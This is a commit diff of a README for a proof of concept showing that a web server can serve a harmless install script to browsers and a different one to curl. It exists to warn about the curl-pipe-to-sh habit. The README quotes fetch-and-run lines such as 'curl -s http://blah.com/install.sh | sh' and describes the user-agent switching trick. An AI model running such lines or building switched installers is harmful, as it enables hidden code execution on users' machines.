- Updated REAME with better instructions & actual heroku links.

README.md

@@ -1,17 +1,27 @@
 pipe-to-sh Proof of Concept
 ===========================
 
-Piping direct to sh from the web has its obvious dangers along with some
-not so obvious hidden ones..
+The problem:
 
-This project showcases a possible, non-obvious exploit which relies on
+    curl -s <insert_URL_here>/install.sh | sh
+
+Piping direct to sh from the web has its *obvious* dangers along with some
+*not so obvious* hidden ones..
+
+This project showcases a non-obvious problem with that workflow by
 sniffing the browser's user agent string to change a served .sh file dependent
-on whether or not the browser is curl/libcurl. This would allow a malicious
-person to point a user to a perfectly reasonable looking .sh file while in
-the background providing a different, perhaps evil, .sh file to the user
-told to download via [curl/libcurl](http://curl.haxx.se/) like so:
+on whether or not the browser is curl/libcurl. This could allow a malicious
+person to point a user to a perfectly reasonable looking .sh file in their
+browser, while in the background providing a different, perhaps evil, .sh file
+to the user when downloading via [curl/libcurl](http://curl.haxx.se/).
+
+This source [is running on a (sole) heroku worker](http://pipe-to-sh-poc.herokuapp.com)
+so you can see for yourself. First visit the URL in a browser, then run the line
+below to see what curl would see:
+
+    curl -s http://pipe-to-sh-poc.herokuapp.com/install.sh | cat
 
-    curl -s http://blah.com/install.sh | sh
+N.B Piping to `cat` not `sh`; the file *is* harmless...but why are trusting me?
 
 This is a proof of concept; no damaging code is contained within.